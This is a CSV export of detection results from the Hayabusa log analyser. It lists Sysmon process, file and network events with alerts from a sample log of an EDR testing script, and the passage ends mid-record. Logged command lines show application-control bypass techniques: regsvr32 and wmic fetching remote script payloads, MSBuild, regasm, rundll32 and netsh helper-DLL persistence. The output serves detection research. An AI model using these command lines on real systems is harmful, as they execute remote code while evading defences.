""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 